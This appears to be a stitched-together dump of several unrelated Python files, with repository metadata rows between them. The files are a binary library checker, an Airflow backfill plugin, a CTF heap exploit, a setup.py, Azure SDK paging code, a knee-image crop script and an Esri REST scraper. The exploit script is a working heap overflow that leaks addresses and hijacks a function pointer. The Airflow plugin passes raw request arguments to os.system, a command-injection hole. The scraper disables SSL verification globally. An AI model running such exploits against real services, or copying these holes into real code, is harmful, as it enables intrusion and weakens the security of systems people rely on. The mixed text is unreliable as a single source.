        print('{} is not in ALLOWED_LIBRARIES!'.format(dylib))
    return not offending
def pe_read_libraries(filename) -> List[str]:
    """List the DLLs a PE binary imports (objdump -x)."""
    proc = subprocess.Popen([OBJDUMP_CMD, '-x', filename], stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE, universal_newlines=True)
    stdout, stderr = proc.communicate()
    if proc.returncode:
        raise IOError('Error opening file')
    dlls = []
    for line in stdout.splitlines():
        if 'DLL Name:' in line:
            dlls.append(line.split(': ')[1])
    return dlls
def check_PE_libraries(filename) -> bool:
    """True when every imported DLL is on the PE allow-list."""
    offending = [dll for dll in pe_read_libraries(filename)
                 if dll not in PE_ALLOWED_LIBRARIES]
    for dll in offending:
        print('{} is not in ALLOWED_LIBRARIES!'.format(dll))
    return not offending
# Dispatch table: binary format -> ordered (check name, check function) pairs.
CHECKS = {
'ELF': [
    ('IMPORTED_SYMBOLS', check_imported_symbols),
    ('EXPORTED_SYMBOLS', check_exported_symbols),
    ('LIBRARY_DEPENDENCIES', check_ELF_libraries)
],
'MACHO': [
    ('DYNAMIC_LIBRARIES', check_MACHO_libraries)
],
'PE' : [
    ('DYNAMIC_LIBRARIES', check_PE_libraries)
]
}
def identify_executable(executable) -> Optional[str]:
    """Sniff the binary format from the file's first four bytes.

    :param executable: path of the file to inspect.
    :return: 'PE', 'ELF' or 'MACHO', or None when the magic is unknown.
    :raises IOError/OSError: when the file cannot be opened.
    """
    # Bug fix: the original opened the global `filename` (leaked from the
    # __main__ loop) instead of the `executable` parameter, and never closed
    # the handle.  Use the parameter and a context manager.
    with open(executable, 'rb') as f:
        magic = f.read(4)
    if magic.startswith(b'MZ'):            # DOS/PE stub header
        return 'PE'
    if magic.startswith(b'\x7fELF'):
        return 'ELF'
    if magic.startswith(b'\xcf\xfa'):      # 64-bit Mach-O magic (0xfeedfacf, little-endian)
        return 'MACHO'
    return None
if __name__ == '__main__':
    # Exit status 1 if any argument is unreadable, of unknown format, or
    # fails one of its format's checks; 0 when everything passes.
    retval = 0
    for filename in sys.argv[1:]:
        try:
            etype = identify_executable(filename)
            if etype is None:
                print('{}: unknown format'.format(filename))
                retval = 1
                continue
            failed = []
            for (name, func) in CHECKS[etype]:
                if not func(filename):
                    failed.append(name)
            if failed:
                print('{}: failed {}'.format(filename, ' '.join(failed)))
                retval = 1
        except IOError:
            print('{}: cannot open'.format(filename))
            retval = 1
    sys.exit(retval)
| 35.188925 | 173 | 0.651763 |
ace075a261bf20d6efe7ca0ac79c88d05caa4aa2 | 4,709 | py | Python | plugins/backfill/main.py | leoCamilo/airflow-backfill-util | d1eb0c546894b5ea4f7cf1dfde366686cbd6d085 | [
"MIT"
] | null | null | null | plugins/backfill/main.py | leoCamilo/airflow-backfill-util | d1eb0c546894b5ea4f7cf1dfde366686cbd6d085 | [
"MIT"
] | null | null | null | plugins/backfill/main.py | leoCamilo/airflow-backfill-util | d1eb0c546894b5ea4f7cf1dfde366686cbd6d085 | [
"MIT"
] | 1 | 2019-11-13T06:14:59.000Z | 2019-11-13T06:14:59.000Z | # -*- coding: utf-8 -*-
# Inbuilt Imports
import os
import json
import logging
import datetime
import re
# Custom Imports
import flask
from flask import request
from flask_admin import BaseView, expose
from flask_appbuilder import expose as app_builder_expose, BaseView as AppBuilderBaseView,has_access
from airflow import configuration
from shelljob import proc
# Inspired from
# https://mortoray.com/2014/03/04/http-streaming-of-command-output-in-python-flask/
# https://www.endpoint.com/blog/2015/01/28/getting-realtime-output-using-python
# RBAC inspired from
# https://github.com/teamclairvoyant/airflow-rest-api-plugin
# Set your Airflow home path
# Airflow home directory; raises KeyError when AIRFLOW_HOME is unset.
airflow_home_path = os.environ['AIRFLOW_HOME']
# Local file where history will be stored
FILE = airflow_home_path + '/logs/backfill_history.txt'
# Whether the webserver runs with role-based access control (FAB views).
rbac_authentication_enabled = configuration.getboolean("webserver", "RBAC")
# RE for removing ANSI escape (color/control) sequences from console output
ansi_escape = re.compile(r'\x1B[@-_][0-?]*[ -/]*[@-~]')
# Creating a flask admin BaseView
def file_ops(mode, data=None):
    """Read or append the backfill history file (module-level FILE).

    :param mode: 'r' to read the whole history, 'w' to append `data`.
    :param data: command string to log when mode == 'w'.
    :return: file contents for reads ('' when the file had to be created),
             1 after a successful write, None for any other call.
    """
    if mode == 'r':
        try:
            with open(FILE, 'r') as f:
                return f.read()
        except IOError:
            # First run: create an empty history file.  The original code
            # returned f.close() here (i.e. None); return '' so callers such
            # as flask.Response always receive a string.
            with open(FILE, 'w'):
                pass
            return ''
    elif mode == 'w' and data:
        today = datetime.datetime.now()
        # (removed leftover debug print of os.getcwd())
        with open(FILE, 'a+') as f:
            f.write('{},{}\n'.format(data, today))
        return 1
def get_baseview():
    """Pick the flask view base class matching the webserver's auth mode."""
    return AppBuilderBaseView if rbac_authentication_enabled == True else BaseView
class Backfill(get_baseview()):
    """Flask view exposing airflow backfill/clear helpers.

    SECURITY NOTE(review): all endpoints interpolate raw request arguments
    into shell/CLI commands; see per-method notes below.
    """
    route_base = "/admin/backfill/"
    # The index route differs by auth mode: FAB render_template under RBAC,
    # plain flask-admin render otherwise.
    if rbac_authentication_enabled == True:
        @app_builder_expose('/')
        def list(self):
            """ Render the backfill page to client with RBAC"""
            return self.render_template("backfill_page.html",
                                        rbac_authentication_enabled=rbac_authentication_enabled)
    else:
        @expose('/')
        def base(self):
            """ Render the backfill page to client """
            return self.render("backfill_page.html")
    @expose('/stream')
    @app_builder_expose('/stream')
    def stream(self):
        """ Runs user request and outputs console stream to client"""
        dag_name = request.args.get("dag_name")
        start_date = request.args.get("start_date")
        end_date = request.args.get("end_date")
        clear = request.args.get("clear")
        # Build the CLI argv; clear=true wipes task instances instead of
        # backfilling.  Arguments come straight from the query string.
        if clear == 'true':
            cmd = ['airflow', 'clear', '-c', str(dag_name), '-s', str(start_date), '-e', str(end_date)]
        else:
            cmd = ['airflow', 'backfill', str(dag_name), '-s', str(start_date), '-e', str(end_date), '-i']
        print('BACKFILL CMD:', cmd)
        # Update command used in history
        file_ops('w', ' '.join(cmd))
        g = proc.Group()
        g.run(cmd)
        def read_process():
            # Stream the child's output as server-sent events, stripping
            # ANSI escapes.  NOTE(review): the loop variable `proc` shadows
            # the module-level `shelljob.proc` import inside this generator.
            while g.is_pending():
                lines = g.readlines()
                for proc, line in lines:
                    if not isinstance(line, str):
                        line = line.decode()
                    line = ansi_escape.sub('', line)
                    print('LINE===> {}'.format(line))
                    yield "data:" + line + "\n"
        return flask.Response(read_process(), mimetype='text/event-stream')
    @expose('/background')
    @app_builder_expose('/background')
    def background(self):
        """ Runs user request in background """
        dag_name = request.args.get("dag_name")
        start_date = request.args.get("start_date")
        end_date = request.args.get("end_date")
        clear = request.args.get("clear")
        # create a screen id based on timestamp
        screen_id = datetime.datetime.now().strftime('%s')
        # SECURITY: request args are interpolated into a shell command run
        # via os.system — command-injection risk; they should be validated
        # or passed as an argv list instead.
        if clear == 'true':
            # Prepare the command and execute in background
            background_cmd = f"screen -dmS {screen_id} airflow clear -c {dag_name} -s {start_date} -e {end_date}"
        else:
            background_cmd = f"screen -dmS {screen_id} airflow backfill {dag_name} -s {start_date} -e {end_date} -i"
        # Update command in file
        file_ops('w', background_cmd)
        print(background_cmd)
        os.system(background_cmd)
        response = json.dumps({'submitted': True})
        return flask.Response(response, mimetype='text/json')
    @expose('/history')
    @app_builder_expose('/history')
    def history(self):
        """ Outputs recent user request history """
        return flask.Response(file_ops('r'), mimetype='text/txt')
| 32.253425 | 116 | 0.606286 |
ace07612a8e2abae39cc3a0d5ed373b746ded62c | 5,086 | py | Python | sponsor-challenges/csit/part2 source/heap2-exploit.py | wongwaituck/crossctf-2017-finals-public | bb180bcb3fdb559b7d7040fbe01c4fca98322f11 | [
"MIT"
] | 6 | 2017-06-26T15:07:19.000Z | 2018-10-09T20:03:27.000Z | sponsor-challenges/csit/part2 source/heap2-exploit.py | wongwaituck/crossctf-2017-finals-public | bb180bcb3fdb559b7d7040fbe01c4fca98322f11 | [
"MIT"
] | null | null | null | sponsor-challenges/csit/part2 source/heap2-exploit.py | wongwaituck/crossctf-2017-finals-public | bb180bcb3fdb559b7d7040fbe01c4fca98322f11 | [
"MIT"
] | 1 | 2018-08-18T00:49:02.000Z | 2018-08-18T00:49:02.000Z | #! /usr/bin/env python
import sys
from struct import pack
from optparse import OptionParser
from socket import *
import time
import subprocess
import shlex
import struct
def recv_timeout(the_socket, timeout=0.1):
	"""Drain a non-blocking socket until it goes quiet.

	Keeps reading 8KB chunks; stops `timeout` seconds after the last data
	arrived, or after 2*timeout with no data at all.  Returns everything
	received joined into one string.
	NOTE(review): Python 2 code — under Python 3, recv() returns bytes and
	''.join() would fail.
	"""
	the_socket.setblocking(0)
	total_data=[];data='';begin=time.time()
	while 1:
		#if you got some data, then break after wait sec
		if total_data and time.time()-begin>timeout:
			break
		#if you got no data at all, wait a little longer
		elif time.time()-begin>timeout*2:
			break
		try:
			data=the_socket.recv(8192)
			if data:
				total_data.append(data)
				begin=time.time()   # reset the quiet-period clock
			else:
				time.sleep(0.1)
		except:
			# non-blocking recv raises when nothing is available; keep polling
			pass
	return ''.join(total_data)
def print_and_send(s, command):
	"""Send `command` (newline-terminated) over socket `s` and echo it locally."""
	msg = command + "\n"
	s.send(msg)
	sys.stdout.write(msg)
def exploit(hostname, port):
	"""Run the heap2 CTF exploit against hostname:port.

	Strategy: overflow heap chunk sizes via the service's copy command,
	leak a heap address and the address of print_log_item, compute
	getFlag's address from fixed binary offsets, overwrite the function
	pointer at ftable->fp, then trigger it with "show 0".
	NOTE(review): Python 2 script (print statements, str-based struct
	payloads); all offsets are specific to the heap2 binary.
	"""
	s = socket(AF_INET, SOCK_STREAM)
	try:
		print "[+] Connecting to %s on port %s" % (hostname, port)
		s.connect((hostname, port))
	except:
		print "[+] Connection error"
		sys.exit(1)
	sys.stdout.write(recv_timeout(s))
	print_and_send(s, "add " + "A"*8);
	sys.stdout.write(recv_timeout(s))
	print_and_send(s, "add " + "B"*8);
	sys.stdout.write(recv_timeout(s))
	# Insert a long one
	print_and_send(s, "add " + "C"*16 + struct.pack("<I", 50));
	sys.stdout.write(recv_timeout(s))
	# Copy to overwrite the size of the second one
	print_and_send(s, "copy 2 0");
	sys.stdout.write(recv_timeout(s))
	# Read to leak heap address
	print_and_send(s, "show 1");
	output = recv_timeout(s)
	sys.stdout.write(output)
	# The address of the third entry is here:
	address_2 = struct.unpack("<I", output[20:24])[0]
	print "[+] log_item[2] is found at", hex(address_2)
	# Using gdb to find relative offsets of allocated memory,
	# we know that ftable->fp is at address_2-96
	address_ftable_fp_ptr = address_2 - 96
	print "[+] ftable->fp is at", hex(address_ftable_fp_ptr)
	address_0 = address_2 - 0x50
	print "[+] log_item[0] is at", hex(address_0)
	address_1 = address_2 - 0x50 + 32
	print "[+] log_item[1] is at", hex(address_1)
	# Insert a long one
	# We insert 0x01010101 just because fgets stops at \0
	print_and_send(s, "add "
		+ "D"*16
		+ struct.pack("<I", 0x01010101)
		+ struct.pack("<I", address_ftable_fp_ptr))
	sys.stdout.write(recv_timeout(s))
	# Copy to overwrite the address of the second one
	print_and_send(s, "copy 3 0");
	sys.stdout.write(recv_timeout(s))
	# Now we need to fix up the 0x01010101
	# This part creates the string in memory
	print_and_send(s, "add "
		+ "E"*16
		+ struct.pack("<I", 4))
	sys.stdout.write(recv_timeout(s))
	# Need to insert another string to overwrite the size of log_item[4]
	print_and_send(s, "add "
		+ "F"*8*4
		+ struct.pack("<I", 5*4))
	sys.stdout.write(recv_timeout(s))
	# Copy to fix it up
	print_and_send(s, "copy 5 3");
	sys.stdout.write(recv_timeout(s))
	print_and_send(s, "copy 4 0");
	sys.stdout.write(recv_timeout(s))
	# Read to leak address of print_log_item function in memory
	print_and_send(s, "show 1");
	output = recv_timeout(s)
	sys.stdout.write(output)
	address_print_log_item = struct.unpack("<I", output[0:4])[0]
	print "[+] print_log_item is found at", hex(address_print_log_item)
	# Get offset of debug from address of print_log_item
	# $ objdump -D heap2 | grep print_log_item
	# 00000cfe <print_log_item>:
	# $ objdump -D heap2 | grep getFlag
	# 00000d58 <getFlag>:
	offset = 0x00000d58 - 0x00000cfe
	address_debug = address_print_log_item + offset
	# Overwrite function pointer on heap
	print_and_send(s, "add "
		+ "G"*16
		+ struct.pack("<I", 0x01010101)
		+ struct.pack("<I", address_ftable_fp_ptr))
	sys.stdout.write(recv_timeout(s))
	print_and_send(s, "copy 6 0");
	sys.stdout.write(recv_timeout(s))
	print_and_send(s, "add " + struct.pack("<I", address_debug))
	sys.stdout.write(recv_timeout(s))
	print_and_send(s, "copy 7 1");
	sys.stdout.write(recv_timeout(s))
	#raw_input()
	# Trigger the overwritten function pointer (now getFlag)
	print_and_send(s, "show 0");
	sys.stdout.write("\n\n\nFlag is:")
	sys.stdout.write(recv_timeout(s))
	# Just to close the terminal nicely
	sys.stdout.write("\n")
if __name__ == "__main__":
	# CLI: -H/--host target address, -p/--port target port.
	parser = OptionParser("usage: %prog [options]")
	parser.add_option("-H", "--host", dest="hostname", default="127.0.0.1",
			type="string", help="Target to run against")
	parser.add_option("-p", "--port", dest="portnum", default=1234,
			type="int", help="Target port")
	(options, args) = parser.parse_args()
	exploit(options.hostname, options.portnum)
| 29.74269 | 75 | 0.604797 |
ace078bce172e4965bcc14162faa59aac571b6b2 | 649 | py | Python | setup.py | enricobacis/until_nonidle | 59c267c143c8ab1b5b0814be2f5e03b54045f7ff | [
"MIT"
] | 1 | 2019-02-14T21:19:58.000Z | 2019-02-14T21:19:58.000Z | setup.py | enricobacis/until_nonidle | 59c267c143c8ab1b5b0814be2f5e03b54045f7ff | [
"MIT"
] | null | null | null | setup.py | enricobacis/until_nonidle | 59c267c143c8ab1b5b0814be2f5e03b54045f7ff | [
"MIT"
] | null | null | null | from setuptools import setup
# Use the README (from its 'Description' heading onward) as the long
# description; raises ValueError if the heading is missing.
with open('README.rst') as README:
    long_description = README.read()
    long_description = long_description[long_description.index('Description'):]
setup(
    name='until_nonidle',
    version='0.4',
    description='Execute something as long as the user is idling.',
    long_description=long_description,
    install_requires=['psutil', 'xprintidle'],
    url='http://github.com/enricobacis/until_nonidle',
    author='Enrico Bacis',
    author_email='enrico.bacis@gmail.com',
    license='MIT',
    packages=['until_nonidle'],
    scripts=['scripts/until_nonidle'],
    keywords='idle lock lockscreen action'
)
| 30.904762 | 79 | 0.713405 |
ace078e37d1bc11dd812e12ae6751e598990290f | 5,682 | py | Python | sdk/redhatopenshift/azure-mgmt-redhatopenshift/azure/mgmt/redhatopenshift/v2020_04_30/operations/_operations.py | vincenttran-msft/azure-sdk-for-python | 348b56f9f03eeb3f7b502eed51daf494ffff874d | [
"MIT"
] | 1 | 2022-02-01T18:50:12.000Z | 2022-02-01T18:50:12.000Z | sdk/redhatopenshift/azure-mgmt-redhatopenshift/azure/mgmt/redhatopenshift/v2020_04_30/operations/_operations.py | vincenttran-msft/azure-sdk-for-python | 348b56f9f03eeb3f7b502eed51daf494ffff874d | [
"MIT"
] | null | null | null | sdk/redhatopenshift/azure-mgmt-redhatopenshift/azure/mgmt/redhatopenshift/v2020_04_30/operations/_operations.py | vincenttran-msft/azure-sdk-for-python | 348b56f9f03eeb3f7b502eed51daf494ffff874d | [
"MIT"
] | null | null | null | # pylint: disable=too-many-lines
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, Callable, Dict, Iterable, Optional, TypeVar
from msrest import Serializer
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpResponse
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.mgmt.core.exceptions import ARMErrorFormat
from .. import models as _models
from .._vendor import _convert_request
# Type variable and response-callback alias used by the operations below.
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
# Shared msrest serializer; validation is done server-side for generated SDKs.
_SERIALIZER = Serializer()
_SERIALIZER.client_side_validation = False
def build_list_request(
    **kwargs: Any
) -> HttpRequest:
    """Build the GET request that lists the Microsoft.RedHatOpenShift RP operations."""
    api_version = kwargs.pop('api_version', "2020-04-30")  # type: str
    url = kwargs.pop("template_url", "/providers/Microsoft.RedHatOpenShift/operations")
    # Query string carries only the api-version parameter.
    params = kwargs.pop("params", {})  # type: Dict[str, Any]
    params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
    # Only JSON responses are accepted.
    headers = kwargs.pop("headers", {})  # type: Dict[str, Any]
    headers['Accept'] = _SERIALIZER.header("accept", "application/json", 'str')
    return HttpRequest(method="GET", url=url, params=params, headers=headers, **kwargs)
class Operations(object):
    """Operations operations.
    You should not instantiate this class directly. Instead, you should create a Client instance that
    instantiates it for you and attaches it as an attribute.
    :ivar models: Alias to model classes used in this operation group.
    :type models: ~azure.mgmt.redhatopenshift.v2020_04_30.models
    :param client: Client for service requests.
    :param config: Configuration of service client.
    :param serializer: An object model serializer.
    :param deserializer: An object model deserializer.
    """
    models = _models
    def __init__(self, client, config, serializer, deserializer):
        self._client = client
        self._serialize = serializer
        self._deserialize = deserializer
        self._config = config
    @distributed_trace
    def list(
        self,
        **kwargs: Any
    ) -> Iterable["_models.OperationList"]:
        """Lists all of the available RP operations.
        The operation returns the RP operations.
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: An iterator like instance of either OperationList or the result of cls(response)
        :rtype:
         ~azure.core.paging.ItemPaged[~azure.mgmt.redhatopenshift.v2020_04_30.models.OperationList]
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        api_version = kwargs.pop('api_version', "2020-04-30")  # type: str
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.OperationList"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        # Build the request for either the first page (template URL) or a
        # continuation page (next_link).
        def prepare_request(next_link=None):
            if not next_link:
                request = build_list_request(
                    api_version=api_version,
                    template_url=self.list.metadata['url'],
                )
                request = _convert_request(request)
                request.url = self._client.format_url(request.url)
            else:
                request = build_list_request(
                    api_version=api_version,
                    template_url=next_link,
                )
                request = _convert_request(request)
                request.url = self._client.format_url(request.url)
                request.method = "GET"
            return request
        # Deserialize one page into (next_link, iterator of items).
        def extract_data(pipeline_response):
            deserialized = self._deserialize("OperationList", pipeline_response)
            list_of_elem = deserialized.value
            if cls:
                list_of_elem = cls(list_of_elem)
            return deserialized.next_link or None, iter(list_of_elem)
        # Fetch a page, mapping non-200 statuses to ARM errors.
        def get_next(next_link=None):
            request = prepare_request(next_link)
            pipeline_response = self._client._pipeline.run(  # pylint: disable=protected-access
                request,
                stream=False,
                **kwargs
            )
            response = pipeline_response.http_response
            if response.status_code not in [200]:
                map_error(status_code=response.status_code, response=response, error_map=error_map)
                raise HttpResponseError(response=response, error_format=ARMErrorFormat)
            return pipeline_response
        return ItemPaged(
            get_next, extract_data
        )
    list.metadata = {'url': "/providers/Microsoft.RedHatOpenShift/operations"}  # type: ignore
ace07c413ecf348fe138592e0de18b09d7cad591 | 1,953 | py | Python | DetJoint/preprocess/extract_yolo_det.py | Tommy-Ngx/AutoGradingOA | 5e69bd38abaf01f03d8d837da68701a86bac1bb0 | [
"MIT"
] | 14 | 2019-10-29T10:48:43.000Z | 2022-03-16T08:35:40.000Z | DetJoint/preprocess/extract_yolo_det.py | Tommy-Ngx/AutoGradingOA | 5e69bd38abaf01f03d8d837da68701a86bac1bb0 | [
"MIT"
] | 4 | 2020-03-06T14:49:59.000Z | 2021-11-11T07:48:36.000Z | DetJoint/preprocess/extract_yolo_det.py | Tommy-Ngx/AutoGradingOA | 5e69bd38abaf01f03d8d837da68701a86bac1bb0 | [
"MIT"
] | 8 | 2019-09-19T04:59:04.000Z | 2022-01-31T12:03:46.000Z | # -*- coding: utf-8 -*-
import os, sys, pdb
import deepdish as dd
import glob
from skimage import io
import scipy.misc as misc
# def expand_bbox()
def _expand_interval(lo, hi, expand, limit):
    """Grow [lo, hi] symmetrically by fraction `expand`, clamped to [0, limit]."""
    length = (hi - lo) * (1 + expand)
    mid = (hi + lo) / 2
    start = int(mid - length / 2.0)
    end = int(mid + length / 2.0)
    return max(start, 0), min(end, limit)


def extract_detected_knees(data_dir, det_dir, results_dir, expand=0.3):
    """Crop every detected knee bounding box out of the source radiographs.

    For each PNG in `data_dir`, loads its detections from a same-named .h5
    in `det_dir` (keys "classes" and "coors": [x0, y0, x1, y1]), expands
    each box by `expand`, resizes the crop to 299x299 and saves it under
    results_dir/<label>/<image>_<n>.png.

    Bug fix/generalization: boxes are now clamped to the actual image
    dimensions instead of the hard-coded 2560x2048 of the original scans,
    so images of any size are handled correctly.
    """
    img_list = glob.glob(os.path.join(data_dir, "*.png"))
    for cur_img in img_list:
        cur_name = os.path.splitext(os.path.basename(cur_img))[0]
        det_dict = dd.io.load(os.path.join(det_dir, cur_name + ".h5"))
        img = misc.imread(cur_img)
        height, width = img.shape[0], img.shape[1]
        # Detections are paired: one class label per bounding box.
        for ind, (label, coor) in enumerate(zip(det_dict["classes"], det_dict["coors"]), start=1):
            x_start, x_end = _expand_interval(coor[0], coor[2], expand, width)
            y_start, y_end = _expand_interval(coor[1], coor[3], expand, height)
            thumb = misc.imresize(img[y_start:y_end, x_start:x_end], (299, 299))
            save_path = os.path.join(results_dir, str(label), cur_name + '_' + str(ind) + '.png')
            misc.imsave(save_path, thumb)
if __name__ == "__main__":
    # Default relative paths for the DetKneeData layout; run from this
    # script's directory.
    raw_img_dir = "../../data/DetKneeData/test"
    det_result_dir = "../../data/DetKneeData/det_results"
    auto_test_dir = "../../data/DetKneeData/automatic_test299"
    extract_detected_knees(raw_img_dir, det_result_dir, auto_test_dir)
| 35.509091 | 97 | 0.582181 |
ace07c67c0db059a0e49ea8743bb05f22d61c7ff | 18,009 | py | Python | RestCacheClass.py | mikepianka/EsriRESTScraper | 1058fccecb5a60e65d3c8cc4822dab7f7056ab24 | [
"MIT"
] | null | null | null | RestCacheClass.py | mikepianka/EsriRESTScraper | 1058fccecb5a60e65d3c8cc4822dab7f7056ab24 | [
"MIT"
] | null | null | null | RestCacheClass.py | mikepianka/EsriRESTScraper | 1058fccecb5a60e65d3c8cc4822dab7f7056ab24 | [
"MIT"
] | null | null | null | import os
import sys
import urllib2
import urllib
import re
import datetime
import httplib
import time
import json
import ssl
import logging
import ijson
import arcpy
########Exceptions################
class SchemaMismatch(Exception):
    """Base error for this module; carries a human-readable message."""

    def __init__(self, value):
        # Stored message, echoed back verbatim by __str__.
        self.value = value

    def __str__(self):
        return self.value


class IncorrectWorkspaceType(SchemaMismatch):
    """Raised when the target workspace is not a local geodatabase."""
    pass


class TooManyRecords(SchemaMismatch):
    """Raised when a query would exceed the service's maximum record count."""
    pass


class MapServiceError(SchemaMismatch):
    """Raised when the map service cannot be reached after repeated attempts."""
    pass


class NullGeometryError(SchemaMismatch):
    """Raised when a feature's geometry is null or invalid."""
    pass
########GENERAL FUNCTIONS#################
def getMultiGeometry(geometry):
    """Build an arcpy.Array of arcpy.Arrays from a multi-part geometry.

    Each element of *geometry* is one part (a ring for polygons, a path for
    polylines); each vertex is indexable as (x, y). Returns the nested
    arcpy.Array ready to wrap in arcpy.Polygon / arcpy.Polyline.
    """
    parts = arcpy.Array()
    for part in geometry:
        vertices = arcpy.Array()
        for vertex in part:
            # Vertices may carry extra values (m/z); only x, y are used.
            vertices.add(arcpy.Point(float(vertex[0]), float(vertex[1])))
        parts.add(vertices)
    return parts
def validWorkspace(uri):
    """Return True if *uri* points at a geodatabase workspace.

    The check is a simple substring match for ".gdb" (file geodatabase) or
    ".sde" (enterprise geodatabase) anywhere in the stringified path, so it
    also accepts feature-class paths inside a geodatabase.
    """
    uri = str(uri)
    # Return the boolean expression directly instead of if/else True/False.
    return ".gdb" in uri or ".sde" in uri
def getGeometryType(restGeom):
    """Map an Esri REST geometryType string to an arcpy geometry keyword.

    E.g. "esriGeometryPolygon" -> "POLYGON"; unrecognised values yield
    "Unknown". The markers do not overlap, so scan order is cosmetic.
    """
    markers = (
        ("Polygon", "POLYGON"),
        ("Polyline", "POLYLINE"),
        ("Point", "POINT"),
    )
    for marker, keyword in markers:
        if marker in restGeom:
            return keyword
    return "Unknown"
def dontVerifySSL():
    """Disable HTTPS certificate verification process-wide.

    On Python builds that expose ssl._create_unverified_context, install it
    as the default context factory; on legacy builds that never verified
    certificates the attribute is absent and nothing needs to change.
    """
    unverified = getattr(ssl, "_create_unverified_context", None)
    if unverified is not None:
        ssl._create_default_https_context = unverified
###############REST CACHE CLASS###########################
class RestCache:
    """Mirrors an Esri REST FeatureService layer into a geodatabase feature class.

    On construction the layer's metadata (geometry type, name, spatial
    reference, fields, max record count) is fetched from *url*; the object
    can then create a matching local feature class and (re)populate it by
    paging queries against the service.

    Note: this module targets Python 2 (urllib2/httplib imports at module
    level); the class body itself parses under Python 3 as well.
    """

    def __init__(self, url, token=None, userFields=[], excludeFields=[]):
        # NOTE(review): mutable default arguments are kept for interface
        # compatibility; nothing in this class mutates them.
        self.url = url
        self.token = token
        self.userFields = userFields
        self.excludeFields = excludeFields
        self.__setAttributes()

    def __str__(self):
        return "RestCache object based on %s" % self.url

    def __getEsriRESTJSON(self, url, params, attempt=1, useIjson=False):
        """Helper function to query an Esri REST endpoint and return json.

        Retries up to five times, sleeping 5s between retries, and raises
        MapServiceError once the attempts are exhausted.
        """
        # Wait five seconds if previous error
        if attempt > 1 and attempt != 6:
            time.sleep(5)
        # Set token if registered with object
        if self.token != None:
            params['token'] = self.token
        # all other attempts...
        if attempt <= 5:
            data = urllib.urlencode(params)
            req = urllib2.Request(url, data)
            try:
                response = urllib2.urlopen(req)
            except httplib.BadStatusLine as e:
                # Fix: original passed the literal "%n: %attempt" (no % args).
                self.__logMsg(40, "Bad Status Line at attempt %d" % attempt)
                return self.__getEsriRESTJSON(url, params, attempt + 1, useIjson=useIjson)
            except urllib2.HTTPError as e:
                # Fix: "%n" is not a valid conversion and raised ValueError.
                self.__logMsg(40, "HTTP Error at attempt %d: sleeping" % attempt)
                return self.__getEsriRESTJSON(url, params, attempt + 1, useIjson=useIjson)
            except urllib2.URLError as e:
                # URLError is assumed to be a certificate problem; disable
                # verification and retry.
                self.__logMsg(40, "Verify SSL Cert Error")
                dontVerifySSL()
                return self.__getEsriRESTJSON(url, params, attempt + 1, useIjson=useIjson)
            if useIjson:
                # need to figure out a way to deal with this if error is
                # returned, possibly stop using ijson
                return ijson.items(response, "features.item")
            else:
                final = json.loads(response.read())
                if 'error' in final.keys():
                    self.__logMsg(40, "Error in json loads " + str(final))
                    return self.__getEsriRESTJSON(url, params, attempt + 1)
                elif 'features' in final.keys():
                    return final['features']
                else:
                    return final
        else:
            self.__logMsg(30, "Too many attempts")
            raise MapServiceError("Error Accessing Map Service " + self.url)

    # Function that sets the attributes of the RestCache object. All attributes
    # are retrieved from the URL endpoint.
    # To do - M values and Z values
    def __setUpdateFields(self, serviceFields):
        """Sets the fields that will be updated from the FeatureService. This does not include ID or Geometry fields"""
        updateFields = []
        for field in serviceFields:
            # Skip OID/GUID/geometry fields, shape-derived fields, and any
            # field the user asked to manage or exclude.
            if (field['type'] in ['esriFieldTypeOID', 'esriFieldTypeGeometry', 'esriFieldTypeGUID'] or 'shape' in field['name'].lower() or field['name'] in self.userFields + self.excludeFields):
                pass
            else:
                updateFields.append(field)
        # The geometry token always leads the insert-cursor field list.
        updateFields.insert(
            0, {"name": 'Shape@', "type": "esriFieldTypeGeometry"})
        self.updateFields = updateFields

    def __setAttributes(self):
        """Set attributes of object based on Esri REST Endpoint for FeatureService"""
        values = {"f": "json"}
        layerInfo = self.__getEsriRESTJSON(self.url, values)
        # Geometry Type
        geometryType = getGeometryType(layerInfo['geometryType'])
        self.geometryType = geometryType
        # Name
        name = arcpy.ValidateTableName(layerInfo['name'])
        self.name = name
        # Spatial Reference - both the wkid and the arcpy SpatialReference
        # object; fall back to WGS84 in case it's in a wkt.
        try:
            wkid = layerInfo['extent']['spatialReference']['wkid']
        except:
            wkid = 4326
        sr = arcpy.SpatialReference()
        sr.factoryCode = int(wkid)
        sr.create()
        self.sr = sr
        self.wkid = wkid
        # fields used to update the feature class are a subset of all the
        # fields in a feature class
        fields = layerInfo['fields']
        self.__setUpdateFields(fields)
        # Max record count per query; 1000 is the historical Esri default.
        if 'maxRecordCount' in layerInfo:
            self.maxRecordCount = int(layerInfo['maxRecordCount'])
        else:
            self.maxRecordCount = 1000

    def createFeatureClass(self, location, name="", excludeFields=[]):
        """Primary method to create a feature class based on an Esri
        FeatureService REST endpoint"""
        if not self.excludeFields:
            self.excludeFields = excludeFields
        self.updateFields = [
            f for f in self.updateFields if f['name'] not in self.excludeFields]
        if not validWorkspace(location):
            raise IncorrectWorkspaceType(
                "Incorrect workspace - feature class must be created in a local geodatabase")
        if name != "":
            self.name = name
        self.featureClassLocation = location
        featureset = arcpy.CreateFeatureclass_management(out_path=self.featureClassLocation,
                                                         out_name=self.name,
                                                         geometry_type=self.geometryType,
                                                         spatial_reference=self.sr)
        self.__createFields()
        return featureset

    def recreateFeatureClass(self, target, userFields=[], excludeFields=[]):
        """Method to recreate target feature class by recreating fields from REST Endpoint
        Can be invoked if SchemaMismatch error is thrown and caught"""
